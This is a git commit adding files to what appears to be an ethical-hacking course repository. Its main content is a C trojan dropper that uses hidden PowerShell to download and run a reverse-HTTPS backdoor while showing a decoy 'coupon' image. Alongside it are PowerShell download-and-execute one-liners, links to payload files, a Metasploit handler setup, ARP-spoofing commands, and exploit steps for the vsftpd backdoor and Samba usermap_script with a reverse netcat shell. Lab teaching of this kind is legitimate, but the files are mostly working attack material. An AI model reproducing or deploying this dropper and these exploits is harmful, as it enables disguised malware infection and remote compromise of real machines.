rearrange files

EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/commands.TXT

@@ -0,0 +1,77 @@
+https://www.dropbox.com/s/snby65gmwh92esj/amazon_coupon_code_Vl8_icon.ico
+https://www.dropbox.com/s/gxh0ickzpr34t4o/amazon-coupon-code.jpg
+https://www.dropbox.com/s/b01iqpmb9vfslrp/autoit-download-and-execute.au3
+https://www.dropbox.com/s/03cvti4wgu0dx0l/rev_https_8080.zip
+
+ls /root/.set/reports/powershell/
+mv /root/.set/reports/powershell/x86_powershell_injection.txt /var/www/html/payload.txt
+
+mv evil.exe /var/www/html/backdoor_image
+
+use multi/handler
+set PAYLOAD windows/meterpreter/reverse_https
+set LHOST 10.0.2.10
+set LPORT 8080
+exploit 
+
+
+
+
+
+
+
+
+
+
+Other useful commands
+
+powershell (new-object System.Net.WebClient).DownloadFile('http://www.xys.org/buttons/xys_cover.gif','C:\Users\IEUser\cover.gif')
+
+https://www.linkedin.com/pulse/go-hell-powershell-powerdown-attacks-kirtar-oza-cissp-cisa-ms-/
+
+https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/increased-use-of-powershell-in-attacks-16-en.pdf
+
+ powershell.exe \"IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\"
+
+"powershell.exe \"IEX ((new-object net.webclient).downloadstring('http://10.0.0.13/payload.txt '))\""
+
+powershell.exe "IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))"
+
+gcc evil_image.c -o evil_image.exe
+
+
+char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe";
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+int main()
+{
+char str[200]="http://10.0.2.10/evil-files/rev_https_8080.exe";
+char url[200]="";
+char shellCMD[400]="";
+printf("URL of a backdoor: ");
+//gets(str);
+
+strcat(url,"'");
+strcat(url,str);
+strcat(url,"'");
+
+printf(url);
+printf("\n");
+
+char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(";
+strcat(shellCMD,shellCMD_head);
+strcat(shellCMD,url);
+strcat(shellCMD,",\'C:\\Users\\Public\\screenshot.exe\')");
+
+printf(shellCMD);
+getchar();
+
+
+//system("powershell.exe \"IEX( (new-object net.webclient).downloadstring('http://10.0.2.10/payload.txt'))\"");
+//system("powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(url, 'C:\\Users\\Public\\screenshot.exe') "); 
+system(shellCMD);
+system("powershell.exe start C:\\Users\\Public\\screenshot.exe"); 
+return 0;
+}

EthicalHacking/Labs/2_Attack_Client/hide_backdoor_in_image/evil.c

@@ -0,0 +1,101 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+/*
+system("powershell.exe \"IEX( (new-object net.webclient).downloadstring
+('http://10.0.2.10/payload.txt'))\"");
+system("powershell.exe -w hidden -c (new-object System.Net.WebClient).
+Downloadfile('http://10.0.2.10/payload.txt', 'C:\\Users\\Public\\screenshot.exe') ");
+system("powershell.exe start C:\\Users\\Public\\backdoor.exe"); 
+system("powershell.exe start C:\\Users\\Public\\coupon.jpg"); 
+*/
+
+void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc);
+void powershellcmdRun(char * shellCMDRun, char * outputLoc);
+char* insert_char_realloc (char *str, int len);
+
+int main()
+{
+
+
+//You need to make changes here
+char url_evil[200]="http://10.0.2.10/rev_https_8080.exe";
+char url_image[200]="http://10.0.2.10/amazon-coupon-code.jpg";
+//char url_evil[200]="https://pbs.twimg.com/profile_images/1057899591708753921/PSpUS-Hp_400x400.jpg"; //for test
+//char url_image[200]="https://pbs.twimg.com/profile_images/54789364/JPG-logo-highres_400x400.jpg"; //for testing
+char backdoorLoc[200]="C:\\Users\\Public\\backdoor.exe";
+char outputLoc_image[200]="C:\\Users\\Public\\coupon.jpg";
+
+
+
+// ==================download backdoor
+char shellCMD[400]="";
+powershellDownloadCmd(url_evil, shellCMD, backdoorLoc);
+//printf("URL: %s\n", shellCMD);
+system(shellCMD);
+
+//================== download image
+char shellCMD_image[400]="";
+powershellDownloadCmd(url_image, shellCMD_image, outputLoc_image);
+//printf("URL: %s\n", shellCMD_image);
+system(shellCMD_image);
+
+//=============execute backdoor
+char shellCMDRun[400]="";
+powershellcmdRun(shellCMDRun,  insert_char_realloc (backdoorLoc, strlen(backdoorLoc)));
+//printf("command: %s\n", shellCMDRun);
+system(shellCMDRun);
+
+//=============open an image
+char shellCMDRun_image[400]="";
+powershellcmdRun(shellCMDRun_image,  insert_char_realloc (outputLoc_image, strlen(outputLoc_image)));
+//printf("command: %s\n", shellCMDRun_image);
+system(shellCMDRun_image);
+
+return 0;
+}
+
+/* function returning a powershell command */
+void powershellDownloadCmd(char * url, char * shellCMD, char * outputLoc){
+  char url_with_quote[200]="";
+  strcat(url_with_quote,"'");
+  strcat(url_with_quote,url);
+  strcat(url_with_quote,"'");
+
+  char loc_with_quote[200]="";
+  strcat(loc_with_quote,",\'");
+  strcat(loc_with_quote,outputLoc);
+  strcat(loc_with_quote,"\')");
+
+
+  char shellCMD_head[400]="powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile(";
+  strcat(shellCMD,shellCMD_head);
+  strcat(shellCMD,url_with_quote);
+  strcat(shellCMD,loc_with_quote);
+}
+
+
+void powershellcmdRun(char * shellCMDRun, char * outputLoc){
+  char shellCMD_head[400]="\"powershell.exe start ";
+  strcat(shellCMDRun,shellCMD_head);
+  strcat(shellCMDRun,outputLoc);
+  strcat(shellCMDRun,"\"");
+}
+
+char* insert_char_realloc (char *str, int len){
+int i;
+int j=0;
+char * str_temp = (char *)malloc(len + 10);
+for (i=0;i<len;i++){
+  str_temp[j] = str[i];
+  if(str[i]=='\\'){
+     j++;	  
+     str_temp[j] = '\\';
+  }
+  j++;
+}
+return str_temp;
+}
+
+

EthicalHacking/Labs/3_Attack_Server/1_Metasploitable2_Installation/commands.TXT

@@ -0,0 +1,3 @@
+https://information.rapid7.com/download-metasploitable-2017.html
+
+poweroff

EthicalHacking/Labs/3_Attack_Server/2_Server_Misconfigration/commands.TXT

@@ -0,0 +1,14 @@
+arp -a //router's ip
+
+//install mitmf
+apt-get update
+apt-get install mitmf -y
+
+//attack
+mitmf --arp --spoof --gateway 10.0.2.1  --targets 10.0.2.15 -i eth0 
+mitmf --arp --spoof --gateway 10.0.2.1  --targets 10.0.2.15 -i eth0 --screen
+//-hsts
+
+//Website
+http://www.stealmylogin.com/demo.html
+http://w3schools.invisionzone.com/

EthicalHacking/Labs/3_Attack_Server/3_Server_Preexisting_backdoor/commands.TXT

@@ -0,0 +1,7 @@
+use exploit/unix/ftp/vsftpd_234_backdoor
+show options
+set RHOST 10.0.2.12
+exploit
+
+iptables -I INPUT -p tcp --dport 21 --syn -j LOG --log-prefix "TCP_SYN"
+grep -i "TCP_SYN" syslog

EthicalHacking/Labs/3_Attack_Server/4_Server_code_injection_BOF/commands.TXT

@@ -0,0 +1,12 @@
+https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
+msfconsole
+use exploit/multi/samba/usermap_script
+set RHOST 10.0.2.12 //set the target IP
+set RPORT 139 //set the target port
+
+set PAYLOAD cmd/unix/reverse_netcat
+
+set LHOST 10.0.2.10 //set the attaker IP
+set LPORT 2222 //set the attaker port
+
+exploit

FSCS727_Forensics/Labs/Network_Forensics/Server_Investigation.TXT

@@ -0,0 +1 @@
+see ethical attacking->attacking server->remote login